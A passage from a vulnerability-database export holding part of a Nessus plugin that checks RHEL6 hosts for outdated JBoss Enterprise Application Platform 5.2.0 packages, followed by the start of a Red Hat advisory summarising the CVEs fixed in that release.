value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:netty\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-eap-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-eap-docs-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-ant-bundle-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-common-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-dbutils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugindoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-filetemplate-bundle-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-plugin-validator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-pluginAnnotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-pluginGen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-rtfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-aop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-context\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wss4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-security\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n# Deprecated\nexit(0, \"This plugin has been temporarily deprecated.\");\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL6\", reference:\"aopalliance-1.0-5.3.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"apache-cxf-2.2.12-6.1.patch_04.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"bsh2-2.0-0.b4.15.patch01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"bsh2-bsf-2.0-0.b4.15.patch01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"glassfish-jaxb-2.1.12-12_patch_03.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"google-guice-2.0-3.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hibernate3-3.3.2-1.9.GA_CP05.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hibernate3-annotations-3.4.0-3.6.GA_CP05.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hibernate3-annotations-javadoc-3.4.0-3.6.GA_CP05.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hibernate3-entitymanager-3.4.0-4.5.GA_CP05.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hibernate3-entitymanager-javadoc-3.4.0-4.5.GA_CP05.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hibernate3-javadoc-3.3.2-1.9.GA_CP05.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hibernate3-search-3.1.1-2.5.GA_CP05.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hibernate3-search-javadoc-3.1.1-2.5.GA_CP05.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hornetq-2.2.24-1.EAP.GA.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"hornetq-native-2.2.20-1.EAP.GA.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"hornetq-native-2.2.20-1.EAP.GA.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hsqldb-1.8.0.10-11_patch_01.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jacorb-jboss-2.3.2-2.jboss_1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"javassist-3.12.0-6.SP1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-aop2-2.1.6-5.CP06.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-bootstrap-1.0.2-1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-cache-core-3.2.11-1.GA.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-cache-pojo-3.0.1-1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-cl-2.0.11-4.GA.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-cluster-ha-server-api-1.2.1-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-common-beans-1.0.1-2.Final.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-common-core-2.2.21-1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb-3.0-api-5.0.2-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-cache-1.0.0-4.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-core-1.3.9-0.4.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-ext-api-1.0.0-4.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-ext-api-impl-1.0.0-3.7.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-interceptors-1.0.9-0.2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-metadata-1.0.0-3.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-metrics-deployer-1.1.1-0.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-security-1.0.2-0.5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-timeout-0.1.1-0.8.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-timeout-3.0-api-0.1.1-0.8.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-timeout-spi-0.1.1-0.8.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-transactions-1.0.2-1.6.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-jacc-1.1-api-5.0.2-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-jad-1.2-api-5.0.2-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-jaspi-1.0-api-5.0.2-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-javaee-5.0.2-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-javaee-poms-5.0.2-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-jaxrpc-api_1.1_spec-1.0.0-16.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-jca-1.5-api-5.0.2-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-jms-1.1-api-5.0.2-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-jpa-deployers-1.0.0-6.SP2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-logmanager-1.1.2-6.GA_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-messaging-1.4.8-12.SP9.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-naming-5.0.3-5.CP02.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-reflect-2.0.4-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-remoting-2.5.4-10.SP4.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-seam2-2.2.6.EAP5-14.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-seam2-docs-2.2.6.EAP5-14.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-seam2-examples-2.2.6.EAP5-14.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-seam2-runtime-2.2.6.EAP5-14.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-security-negotiation-2.1.3-1.GA.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-security-spi-2.0.5-4.SP3_1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-transaction-1.0.1-api-5.0.2-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-vfs2-2.2.1-4.GA.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossas-5.2.0-16.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossas-client-5.2.0-16.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossas-hornetq-5.2.0-7.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossas-messaging-5.2.0-16.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossas-tp-licenses-5.2.0-8.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossas-ws-cxf-5.2.0-10.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossas-ws-native-5.2.0-16.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbosssx2-2.0.5-8.3.SP3_1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossts-4.6.1-12.CP13.7.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossts-javadoc-4.6.1-12.CP13.7.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossweb-2.1.13-2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossweb-el-1.0-api-2.1.13-2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossweb-jsp-2.1-api-2.1.13-2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossweb-lib-2.1.13-2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossweb-servlet-2.5-api-2.1.13-2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossws-3.1.2-13.SP15_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossws-common-1.1.0-9.SP10.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossws-framework-3.1.2-9.SP13.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossws-spi-1.1.2-6.SP8.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jgroups-2.6.22-1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jopr-embedded-1.3.4-19.SP6.9.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jopr-hibernate-plugin-3.0.0-14.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jopr-jboss-as-5-plugin-3.0.0-16.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jopr-jboss-cache-v3-plugin-3.0.0-15.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-demo-1.0.10-12.2.GA_CP04.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-jbossas-1.0.10-12.2.GA_CP04.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-jbossweb2-1.0.10-12.2.GA_CP04.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-tomcat6-1.0.10-12.2.GA_CP04.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"netty-3.2.5-6.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"picketlink-federation-2.1.5-3.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"picketlink-quickstarts-2.1.5-1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"picketlink-quickstarts-idp-2.1.5-1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"picketlink-quickstarts-pdp-2.1.5-1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"picketlink-quickstarts-sts-2.1.5-1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"resteasy-1.2.1-17.CP02_patch02.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"resteasy-examples-1.2.1-17.CP02_patch02.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"resteasy-javadoc-1.2.1-17.CP02_patch02.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"resteasy-manual-1.2.1-17.CP02_patch02.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rh-eap-docs-5.2.0-10.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rh-eap-docs-examples-5.2.0-10.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-ant-bundle-common-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-common-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-client-api-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-comm-api-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-dbutils-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-domain-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-gui-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-native-system-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-plugin-api-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-plugin-container-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-plugindoc-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-util-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-filetemplate-bundle-common-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-helpers-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-jboss-as-common-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-jmx-plugin-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-modules-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-platform-plugin-3.0.0-14.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-plugin-validator-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-pluginAnnotations-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-pluginGen-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-plugins-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-rtfilter-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"spring2-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"spring2-agent-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"spring2-all-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"spring2-aop-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"spring2-beans-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"spring2-context-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"spring2-core-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"wss4j-1.5.12-4_patch_02.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xerces-j2-2.9.1-10.patch02.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xerces-j2-scripts-2.9.1-10.patch02.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-commons-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-commons-jaxp-1.1-apis-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-commons-jaxp-1.2-apis-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-commons-jaxp-1.3-apis-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-commons-resolver10-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-commons-resolver11-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-commons-resolver12-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-commons-which10-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-commons-which11-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-security-1.5.1-2.ep5.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:48:02", "description": "Updated JBoss Enterprise Web Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Web Platform 5.2.0 release serves as a replacement for JBoss Enterprise Web Platform 5.1.2, and includes bug fixes and enhancements. As JBoss Enterprise Web Platform is a subset of JBoss Enterprise Application Platform, refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator# authenticate() (such as the 